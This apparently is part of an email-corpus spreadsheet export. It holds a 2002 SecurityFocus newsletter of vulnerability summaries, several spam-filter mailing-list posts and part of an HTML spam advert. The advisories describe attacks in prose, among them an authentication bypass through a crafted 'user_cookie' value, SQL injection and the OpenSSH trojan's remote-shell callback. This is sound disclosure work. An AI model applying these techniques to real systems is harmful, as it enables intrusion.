 gaining local access to the vulnerable system. More primitive attacks may
 result in the server process crashing, possibly producing a denial of
 service condition.
 The consequences of exploitation may vary with the nature of the
 application using OpenSSL.
 Oracle reports that CorporateTime Outlook Connector is only vulnerable
 under Microsoft Windows 98, NT, 2K, and XP.
 ** This vulnerability was originally part of BID 5353, Multiple OpenSSL
 Buffer Overflow Vulnerabilities. It has now been reissued as a separate
 vulnerability.
 2. Abyss Web Server HTTP GET Request Directory Contents Disclosure Vulnerability
 BugTraq ID: 5345
 Remote: Yes
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5345
 Summary:
 Abyss Web Server is a freely available personal web server. It is
 maintained by Aprelium Technologies and runs on Microsoft Windows
 operating systems, as well as Linux.
 A vulnerability has been reported for Abyss Web Server 1.0.3 running on a
 Microsoft Windows platform. It is possible for an attacker to make a
 request such that the contents of the specified directory are revealed.
 The vulnerability occurs due to the manner in which excessive '/'
 characters are handled in web requests. An attacker making a GET request
 followed by 256 '/' characters will cause Abyss Web Server to return an
 error page containing the directory listing of the specified directory.
 An attacker may be able to use this information to launch further,
 potentially damaging attacks, against a vulnerable system.
 3. DotProject User Cookie Authentication Bypass Vulnerability
 BugTraq ID: 5347
 Remote: Yes
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5347
 Summary:
 dotproject is web-based project management software, written in PHP.  It
 is designed to run on Unix and Linux variants.
 dotproject is prone to an issue which may allow remote attackers to bypass
 authentication and gain administrative access to the software.
 This may be accomplished by submitting a maliciously crafted 'user_cookie'
 value either manually or via manipulation of URI parameters.  For example,
 the attacker may manually craft a cookie with a 'user_cookie' value of 1
 and submit it to the project management system.  An attacker may also
 submit a malicious web request with the 'user_cookie' URI parameter set to
 1.  In both instances, the attacker will gain administrative access to the
 project management system.
 This problem is due to the software relying on the 'user_cookie' value to
 authenticate the user.
 4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
 BugTraq ID: 5362
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5362
 Summary:
 OpenSSL is an open source implementation of the SSL protocol. It is used
 by a number of other projects, including but not restricted to Apache,
 Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
 systems.
 A vulnerability has been reported for OpenSSL. The vulnerability affects
 SSLv3 session IDs.
 When initiating contact with SSLv3 servers, clients and servers alike
 exchange information. Session information is stored in a session key with
 a unique session ID.
 Reportedly when a an oversized SSL version 3 session ID is supplied to a
 client from a malicious server, it is possible to overflow a buffer on the
 remote system. This could result in key memory areas on the vulnerable,
 remote system being overwritten, including stack frame data.
 An attacker may be able to take advantage of this vulnerability to execute
 malicious code on a vulnerable SSLv3 client machine.
 Oracle reports that CorporateTime Outlook Connector is only vulnerable
 under Microsoft Windows 98, NT, 2K, and XP.
 ** This vulnerability was originally part of BID 5353, Multiple OpenSSL
 Buffer Overflow Vulnerabilities. It has now been reissued as a separate
 vulnerability.
 5. phpBB2 Gender Mod Remote SQL Injection Vulnerability
 BugTraq ID: 5342
 Remote: Yes
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5342
 Summary:
 phpBB2 is an open-source web forum application that is written in PHP and
 backended by a number of database products. It will run on most Unix and
 Linux variants, as well as Microsoft Windows operating systems.
 Gender Mod is a modification for phpBB2 which allows the association of a
 gender with a given user profile. A SQL injection vulnerability has been
 reported in this mod.
 A malicious user may modify the specified value for 'gender' when updating
 their profile. It is possible to include additional SQL statements in this
 string, and subvert the SQL statement used to update the user profile.
 It has been reported possible to gain administrative access to the phpBB2
 site through exploitation of this issue. Other attacks may be possible,
 including the ability to view sensitive database information or to modify
 additional information stored in the database.
 6. ShoutBox Form Field HTML Injection Vulnerability
 BugTraq ID: 5354
 Remote: Yes
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5354
 Summary:
 shoutBOX is web-based user feedback software.  It is written in PHP and
 runs on Unix and Linux variants as well as Microsoft Windows operating
 systems.
 ShoutBox does not sufficiently sanitize HTML tags from input supplied via
 form fields.  In particular, the user website URL field of the feedback
 form is not sanitized of HTML tags.
 Attackers may exploit this lack of input validation to inject arbitrary
 HTML and script code into pages that are generated by the script.  This
 may result in execution of attacker-supplied code in the web client of a
 user who visits such a page.  HTML and script code will be executed in the
 security context of the site hosting the software.
 This condition may be exploited to hijack web content or potentially steal
 cookie-based authentication credentials.
 7. Sympoll File Disclosure Vulnerability
 BugTraq ID: 5360
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5360
 Summary:
 Sympoll is web-based voting booth software.  It is implemented in PHP and
 will run on most Unix and Linux variants as well as Microsoft Windows
 operating systems.
 Sympoll is prone to an issue which may allow remote attackers to disclose
 the contents of arbitrary webserver readable files.  This vulnerability is
 only present on hosts which are running the vulnerable version of the
 software and have the PHP 'register_globals' directive enabled.  The
 source of this vulnerability is reported to be insufficient integrity
 checking of variables.
 The vendor has stated that this issue is only believed to affect Sympoll
 version 1.2.
 Exploitation of this issue on Microsoft Windows operating systems may
 potentially expose arbitrary system files since webservers typically run
 in the SYSTEM context.
 8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
 BugTraq ID: 5366
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5366
 Summary:
 OpenSSL is an open source implementation of the SSL protocol.  It is used
 by a number of other projects, including but not restricted to Apache,
 Sendmail, Bind, etc..  It is commonly found on Linux and Unix based
 systems.
 A remotely exploitable denial of service condition has been reported in
 the OpenSSL ASN.1 library.
 This vulnerability is due to parsing errors and affects SSL, TLS, S/MIME,
 PKCS#7 and certificate creation routines.  In particular, malformed
 certificate encodings could cause a denial of service to server and client
 implementations which depend on OpenSSL.
 Oracle reports that CorporateTime Outlook Connector is only vulnerable
 under Microsoft Windows 98, NT, 2K, and XP.
 ** This vulnerability was originally part of BID 5353, Multiple OpenSSL
 Buffer Overflow Vulnerabilities. It has now been reissued as a separate
 vulnerability.
 9. William Deich Super SysLog Format String Vulnerability
 BugTraq ID: 5367
 Remote: No
 Date Published: Jul 31 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5367
 Summary:
 super is an open source set-uid root utility that allows for a similar
 functionality to that of the sudo utility. It is written for use on Linux
 and Unix variant operating systems.
 super is prone to a format string vulnerability. This problem is due to
 incorrect use of the syslog() function to log error messages. It is
 possible to corrupt memory by passing format strings through the
 vulnerable logging function. This may potentially be exploited to
 overwrite arbitrary locations in memory with attacker-specified values.
 The vulnerability is a result of compiling super with syslog support. Due
 to an error in the file, error.c, users that are not in the super
 configuration file will still be able to execute code with root
 privileges.
 Successful exploitation of this issue may allow the attacker to execute
 arbitrary instructions with root privileges.
 10. Frederic Tyndiuk Eupload Plain Text Password Storage Vulnerability
 BugTraq ID: 5369
 Remote: Yes
 Date Published: Jul 31 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5369
 Summary:
 Frederic Tyndiuk Eupload is a small script designed to facilitate
 uploading of files to a remote server. It is written in Perl and should
 work with Microsoft Windows and Linux and Unix variant operating systems.
 A problem with Eupload 1.0 may make it possible for remote attackers to
 gain access to sensitive information.
 Eupload does not cryptographically protect stored passwords. Passwords
 contained in the configuration file, password.txt, are stored in plain
 text. They may be read by simply viewing the file. The file, password.txt,
 is stored in a web accessible location and is, itself, accessible for
 retrieval. Thus it is trivial for an attacker to obtain user passwords and
 abuse the Eupload service.
 This problem could allow an attacker to gain access to the passwords to
 protected resources.
 11. Util-linux File Locking Race Condition Vulnerability
 BugTraq ID: 5344
 Remote: No
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5344
 Summary:
 The util-linux package is a set of commonly used system utilities such as
 'chfn' and 'chsh'.  It is included with many Linux distributions.
 A race condition has been reported in code shared by the util-linux
 utilities.  The condition is related to file locking.  Failure to check
 for the existence of a lockfile prior to sensitive operations may, under
 specific circumstances, open a window of opportunity for attack.  The
 util-linux utilities often write to sensitive files such as /etc/passwd/.
 Attackers may exploit the condition to inject arbitrary data into these
 files to elevate privileges.
 The reported attacks are complex, time dependent and require specific
 circumstances such as system administrator interaction and a large passwd
 file.
 Red Hat Linux is known to ship with util-linux as a core component.
 Other distributions, those that are derived from Red Hat in particular,
 may also be vulnerable.
 It should be noted that the utilities included with the shadow-utils
 package (shipped with SuSE Linux) are not vulnerable.
 12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer Overflow Vulnerability
 BugTraq ID: 5361
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5361
 Summary:
 OpenSSL is an open source implementation of the SSL protocol. It is used
 by a number of other projects, including but not restricted to Apache,
 Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
 systems.
 A vulnerability has been reported for OpenSSL 0.9.7 pre-release versions.
 This vulnerability is present only when Kerberos is enabled for a system
 using SSL version 3.
 When initiatiating contact between a SSLv3 server, master keys are
 exchanged between the client and the server. When an oversized master key
 is supplied to a SSL version 3 server by a malicious client, it may cause
 a buffer to overflow on the vulnerable system. As a result, stack memory
 on the vulnerable server will become corrupted. This could enable the
 attacker to take control of the SSLv3 server process and cause it to
 execute malicious, attacker supplied code.
 ** This vulnerability was originally part of BID 5353, Multiple OpenSSL
 Buffer Overflow Vulnerabilities. It has now been reissued as a separate
 vulnerability.
 13. OpenSSL ASCII Representation Of Integers Buffer Overflow Vulnerability
 BugTraq ID: 5364
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5364
 Summary:
 OpenSSL is an open source implementation of the SSL protocol.  It is used
 by a number of other projects, including but not restricted to Apache,
 Sendmail, Bind, etc..  It is commonly found on Linux and Unix based
 systems.
 Remotely exploitable buffer overflow conditions have been reported in
 OpenSSL.  This issue is due to insufficient checking of bounds with
 regards to ASCII representations of integers on 64 bit platforms.  It is
 possible to overflow these buffers on a vulnerable system if overly large
 values are submitted by a malicious attacker.
 Exploitation of this vulnerability may allow execution of arbitrary code
 with the privileges of the vulnerable application, service or client.
 Oracle reports that CorporateTime Outlook Connector is only vulnerable
 under Microsoft Windows 98, NT, 2K, and XP.
 ** This vulnerability was originally part of BID 5353, Multiple OpenSSL
 Buffer Overflow Vulnerabilities. It has now been reissued as a separate
 vulnerability.
 14. ParaChat Phantom User Denial Of Service Vulnerability
 BugTraq ID: 5370
 Remote: Yes
 Date Published: Jul 31 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5370
 Summary:
 ParaChat is a web-based chatting system.  It is available for most Unix
 and Linux variants as well as Microsoft Windows operating systems.
 ParaChat chat servers are prone to a denial of service condition.
 If a user has left the webpage for a chat room using the Back or Forward
 buttons of their browser in lieu of logging out, their account will still
 be logged into the chat room until it times out 15 minutes later.  A
 malicious user may do this repeatedly as different users to overload the
 chat server with "phantom" users.  A denial of service may be the result.
 15. OpenSSH Trojan Horse Vulnerability
 BugTraq ID: 5374
 Remote: Yes
 Date Published: Aug 01 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5374
 Summary:
 OpenSSH is a freely available implementation of the SSH client-server
 protocol. It is distributed and maintained by the OpenSSH team.
 Reportedly, the server hosting openssh, ftp.openbsd.org, was compromised
 recently. It has been reported that the intruder made modifications to the
 source code of openssh to include trojan horse code. Downloads of the
 openssh source code from ftp.openbsd.org between July 30, 2002 and July
 31, 2002 likely contain the trojan code.
 The trojan code appears to be included in the file, bf-test.c. Reports say
 that the trojan will run once upon compilation of openssh. The trojan
 process is named 'sh' or the compiling user's default shell. Once executed
 the trojan attempts to connect to 203.62.158.32 on port 6667. The trojan
 will then wait for one of three commands. A connection to the specified
 address is attempted once every hour.
 'D' will cause the trojan to execute '/bin/sh'. 'M' will cause the trojan
 to respawn and 'A' will terminate the trojan process. It is highly
 probable that this trojan will give remote root access to vulnerable
 systems.
 The following sites also have been reported to carry the trojaned version of openssh-3.4p1.tar.gz:
 ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/
 ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/
 ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/
 It is not known whether other sites are affected as well.
 FreeBSD has reported the following MD5 checksum information. The following
 is the MD5 checksum of the trojaned version of openssh: MD5
 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
 The following is the MD5 checksum of openssh in the FreeBSD ports
 directory: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
 Note that a different checksum does not mean the backdoor does not exist.
 *** The OpenSSH team has released an advisory. Fixed versions of openssh
 are available for download since 1300 UTC August 1, 2002. The following
 MD5 checksum information was provided for fixed versions of openssh:
 MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
 MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
 MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
 MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
 MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a
 16. Bharat Mediratta Gallery Remote File Include Vulnerability
 BugTraq ID: 5375
 Remote: Yes
 Date Published: Aug 01 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5375
 Summary:
 Gallery is an open source web based photo album. It is written in PHP and
 is available for Linux and Unix variant as well as Microsoft Windows
 operating systems.
 Gallery is prone to an issue which may allow remote attackers to include
 arbitrary files located on remote servers. This issue is present in the
 following PHP script files provided with Gallery: errors/configmode.php
 errors/needinit.php errors/reconfigure.php errors/unconfigured.php
 captionator.php
 An attacker may exploit this by supplying a path to a file, 'init.php', on
 a remote host as a value for the 'GALLERY_BASEDIR' parameter.
 If the remote file is a PHP script, this may allow for execution of
 attacker-supplied PHP code with the privileges of the webserver.
 Successful exploitation may provide local access to the attacker.
 17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer Overflow Vulnerability
 BugTraq ID: 5385
 Remote: No
 Date Published: Aug 02 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5385
 Summary:
 John G. Myers mpack/munpack is a pair of utilities to encode and decode
 MIME format email. Versions are available for Linux and Unix variant
 operating systems as well as Microsoft DOS.
 A buffer overflow vulnerability has been reported for munpack 1.5.
 Reportedly, it is possible to cause munpack to crash when it receives a
 malformed email or NNTP news article.
 As this vulnerability is the result of a buffer overflow condition, it may
 be possible for an attacker to cause munpack to execute malicious attacker
 supplied code. This has not, however, been confirmed.
 18. Dispair Remote Command Execution Vulnerability
 BugTraq ID: 5392
 Remote: Yes
 Date Published: Jul 30 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5392
 Summary:
 Dispair is a web-based .tar.gz archive viewer.  It is written in Perl and
 is available for Linux and Unix operating systems.
 Dispair fails to sufficiently validate user-supplied input before it is
 passed to the shell via the Perl open() function.  A remote attacker may
 exploit this condition by injecting arbitrary commands into CGI parameters
 in a request to the vulnerable script.
 The result of successful exploitation is that attackers may potentially
 exploit this issue to execute arbitrary commands on the underlying shell
 with the privileges of the webserver process.
 19. Mailreader Session Hijacking Vulnerability
 BugTraq ID: 5393
 Remote: Yes
 Date Published: Aug 02 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5393
 Summary:
 Mailreader is an open source project which allows POP3 mail access through
 a web interface. Mailreader is implemented in Perl, and should work under
 Microsoft Windows, Linux and other Unix based operating systems.
 A vulnerability has been reported in some versions of Mailreader. It may
 be possible for a remote attacker to hijack the session of a legitimate
 user of the system. This may result in access to sensitive information, or
 the ability to send mail and otherwise function as the legitimate user.
 Full exploit details are not available. It is possible that this
 vulnerability results from session information being tracked through CGI
 parameters, which may be trivially spoofed by a remote user. This
 possibility has not, however, been confirmed.
 20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability
 BugTraq ID: 5386
 Remote: No
 Date Published: Aug 02 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5386
 Summary:
 John G. Myers mpack/munpack is a pair of utilities to encode and decode
 MIME format email. Versions are available for Linux and Unix variant
 operating systems as well as Microsoft DOS.
 A vulnerability has been reported for mpack/munpack 1.5. Reportedly, it is
 possible to cause munpack to create files outside of a designated
 directory. When mpack/munpack receives a MIME encoded message with an
 attachment that refers to a file, using a '../' sequence followed by the
 filename, it may decode the attachment outside of a designated directory.
 The impact of this vulnerability is limited as it has been reported that
 munpack will only accept a single '../' sequence and will not overwrite
 any existing files.
 21. Fake Identd Client Query Remote Buffer Overflow Vulnerability
 BugTraq ID: 5351
 Remote: Yes
 Date Published: Jul 29 2002 12:00AM
 Relevant URL:
 http://www.securityfocus.com/bid/5351
 Summary:
 Fake Identd is an open source Ident server designed to return the same
 information to all incoming requests. It is implemented by Tomi Ollila,
 and available for Linux and a number of other Unix based operating
 systems.
 Reportedly, some versions of Fake Identd fail to properly handle long
 client requests. A specially formatted request split across multiple TCP
 packets may cause an internal buffer to overflow. Reportedly, execution of
 arbitrary code as the Fake Identd server process is possible.
 Fake Identd is designed to drop privileges. However, it has also been
 reported that this behavior is flawed in some versions. As a result,
 exploitation may result in the execution of code with root privileges.
 III. LINUX FOCUS LIST SUMMARY
 ---------------------------------
 1. LDAP Auth? (Thread)
 Relevant URL:
 http://online.securityfocus.com/archive/91/285167
 2. LDAP auth (Thread)
 Relevant URL:
 http://online.securityfocus.com/archive/91/285168
 3. Administrivia: Gone Fishin' (Thread)
 Relevant URL:
 http://online.securityfocus.com/archive/91/285159_x0018_
 IV. NEW PRODUCTS FOR LINUX PLATFORMS
 ------------------------------------
 1. Gateway Guardian
 by NetMaster Networking Solutions, Inc.
 Platforms: Linux
 Relevant URL:
 http://www.netmaster.com/products/gatewayguardian.html
 Summary:
 Developed with NetMaster's own Linux distribution tailored specifically
 for firewall applications, Gateway Guardian is a very flexible, high-end
 firewall that takes a revolutionary approach to allowing a company to use
 a lower-end PC as their Internet gateway. Running on a PC that is not the
 Internet gateway, Gateway Guardian uses a pure Java application to
 preconfigure hardware, Internet provider settings, and firewall rules
 through a wizard like format. When the information has been entered, the
 Java application writes an entire Linux operating system and the custom
 firewall configuration onto a 3-1/4" floppy diskette.
 2. PakSecured Linux
 by Paktronix Systems
 Platforms: Linux
 Relevant URL:
 http://www.paktronix.com/products/paklinux.php
 Summary:
 PakSecured Linux PakSecured Linux is currently the only complete Policy
 Routing Operating System with a broad computing platform base. Based on
 the Linux OS, PakSecured Linux runs on all processor families capable of
 running the Linux kernel. Policy Routing encompasses Quality of Service
 (QoS), Advanced TCP/IP routing of IPv4 and IPv6, IPSec encryption and VPN
 structures, Bandwidth Allocation and Traffic Shaping, and Address
 Allocation features such as NAT and IP Masquerade. While these features
 are available independently in various products, PakSecured Linux
 implements the full range of Policy Routing. All of these features are
 integrated into a hardened OS distribution designed to operate in hostile
 network environments. PakSecured Linux has no desktop or user based
 functionality and is specifically targeted at servers with a need for high
 security, 24x7 uptime, and which are required to run without operator
 intervention. Coupling these needs with the flexibility and power of a
 complete Policy Routing structure puts PakSecured Linux into a unique
 niche.
 3. Progressive Systems VPN
 by Progressive Systems
 Platforms: Linux, Propietary Hardware
 Relevant URL:
 http://www.progressive-systems.com/products/vpn/
 Summary:
 Progressive Systems VPN is a remote access VPN designed to let you quickly
 and securely allow remote network access to whomever you choose, and to
 only those you allow. Progressive Systems VPN features SmartGate from
 V-One. SmartGate is the market share leading extranet VPN product now
 available for Linux or as an appliance through Progressive Systems.
 V. NEW TOOLS FOR LINUX PLATFORMS
 --------------------------------
 1. Astaro Security Linux (Stable 3.x) v3.202
 by astaro
 Relevant URL:
 http://www.astaro.com/products/index.html
 Platforms: Linux, POSIX
 Summary:
 Astaro Security Linux is a firewall solution. It does stateful packet
 inspection filtering, content filtering, user authentication, virus
 scanning, VPN with IPSec and PPTP, and much more. With its Web-based
 management tool, WebAdmin, and the ability to pull updates via the
 Internet, it is pretty easy to manage. It is based on a special hardened
 Linux 2.4 distribution where most daemons are running in change-roots and
 are protected by kernel capabilities.
 2. FCheck 2.07.59
 by Michael A. Gumienny
 Relevant URL:
 http://www.geocities.com/fcheck2000/FCheck_2.07.59.tar.gz
 Platforms: AIX, BSDI, DG-UX, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux,
 NetBSD, OpenBSD, Perl (any system supporting perl), SCO, Solaris, SunOS,
 UNIX, Unixware, Windows 2000, Windows 3.x, Windows 95/98, Windows NT
 Summary:
 FCHECK is a very stable PERL script written to generate and comparatively
 monitor a UNIX system against its baseline for any file alterations and
 report them through syslog, console, or any log monitoring interface.
 Monitoring events can be done in as little as one minute intervals if a
 system's drive space is small enough, making it very difficult to
 circumvent. This is a freely-available open-source alternative to
 'tripwire' that is time tested, and is easier to configure and use.
 3. The @stake Sleuth Kit (TASK) v1.50
 by @stake
 Relevant uRL:
 http://www.atstake.com/research/tools/task/
 Platforms: FreeBSD, Linux, MacOS, OpenBSD, Solaris
 Summary:
 The @stake Sleuth Kit (TASK) is the only open source forensic toolkit for
 a complete analysis of Microsoft and UNIX file systems. TASK enables
 investigators to identify and recover evidence from images acquired during
 incident response or from live systems. TASK is also open source, allowing
 investigators to verify the actions of the tool or customize it to
 specific needs.
 VI. SPONSORSHIP INFORMATION
 ---------------------------
 This newsletter is sponsored by: SecurityFocus DeepSight Threat Management
 System
 &gt;&gt;From June 24th - August 31st, 2002, SecurityFocus announces a FREE
 two-week trial of the DeepSight Threat Management System: the only early
 warning system providing customizable and comprehensive early warning of
 cyber attacks and bulletproof countermeasures to prevent attacks before
 they hit your network.
 With the DeepSight Threat Management System, you can focus on proactively
 deploying prioritized and specific patches to protect your systems from
 attacks, rather than reactively searching dozens of Web sites or hundreds
 of emails frantically trying to gather information on the attack and how
 to recover from it.
 Sign up today!
 http://www.securityfocus.com/corporate/products/promo/tmstrial-lx.shtml
 -------------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] where can I find the Habeas patent (application)?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Tuesday, August 27, 2002, at 06:03  AM, Tony L. Svanstrom wrote:
 &gt; Where can I find it, I was searching online without any luck... =(
 You can't, because there isn't one, yet.  Habeas is using a 
 combination of copyright and trademark law to protect their 
 sender warranties.  They hope to patent the system, but they 
 have not been ISSUED a patent.
 --B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</si>
  <si>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Re: [SAdev] Adding Scripting to Spam Assassin
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Marc -- 
 Since perl itself is a scripting language, and allows code to be eval'ed,
 I can't see why we need to go the whole hog and implement another
 turing-complete scripting language in perl.
 Let's go back to *why* this would be useful.  As far as I can see, you're
 proposing this to deal with multi-match rules.  There's already a tracker
 in the bug DB for these, with a proposed implementation.
   http://www.hughes-family.org/bugzilla/show_bug.cgi?id=47
 I think this might have stalled due to shortcomings in the existnig
 proposal, so I've just added my own thoughts on how to implement them. ;)
 Comments on the proposed system would be welcome folks.... reply to the
 bug db.
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }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</si>
  <si>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Tom R:
 &gt; http://www.cliktrik.com/people/family/me/0419.jpg
 &gt; 
 Which one's you?
 TimC
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Before we get too far down this road, what do people think of creating a
 &gt; spambayes package containing classifier and tokenizer?  This is just to
 &gt; minimize clutter in site-packages.
 Too early IMO (if you mean to leave the various other tools out of
 it).  If and when we package this, perhaps we should use Barry's trick
 from the email package for making the package itself the toplevel dir
 of the distribution (rather than requiring an extra directory level
 just so the package can be a subdir of the distro).
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig, 
 For the most part, 99% times 99% users agree on what is spam. This is the
 nature of the spam problem. Now if you were to use a "personal trust"
 system, you'd have a huge personal trust group that would include 99% of
 the userbase. This means 99% times you'd be coming to the same conclusion,
 only after burning several orders of magnitude more CPU cycles. That would
 be stupid. Also, it would take several orders of magnitude longer to
 bootstrap and reach effectiveness. Sub-optimal in the extreme.
 As regards to the problems with the "gray" areas you mentioned, servers
 recognize such content, and razor-agents can use this information to make
 individual determination. Not to mention, users can set a local confidence
 level they are confortable with.
 cheers,
 vipul.
 On Thu, Aug 08, 2002 at 01:09:22PM -0700, Craig R . Hughes wrote:
 &gt; By system-trust vs personal trust I don't mean that the system doesn't
 &gt; have a trust rating for each user, but rather that each individual has
 &gt; one system-wide trust rating. Your trust rating for scoring my mail is
 &gt; the same as your trust rating for scoring your own email, or Joe
 &gt; Schmoe's email. You may be great at flagging most spam, but just really
 &gt; bad at flagging one particular piece of controversial mail which is
 &gt; "gray spam" -- ie some people love it, others hate it. Ideally, I should
 &gt; have my own personal trust score for you which agrees with my beliefs
 &gt; about that controversial mail, rather than the system-wide beliefs. If
 &gt; that doesn't happen, then depending on the trust system's weightings,
 &gt; there are 3 possibilities:
 &gt;
 &gt; 1. All "gray" mail is blocked as spam (ie lots of false positives for
 &gt;    individual users)
 &gt; 2. All "gray" mail is allowed through as nonspam (ie lots of false
 &gt;    negatives for individuals)
 &gt; 3. The entire trust system collapses because noone is trusted due to
 &gt;    conflicting votes about "gray" spam.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</si>
  <si>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Subject: Minimize your phone expenses
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks1_3@yahoo.com?subject=3DConference_Inqu=
 iry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
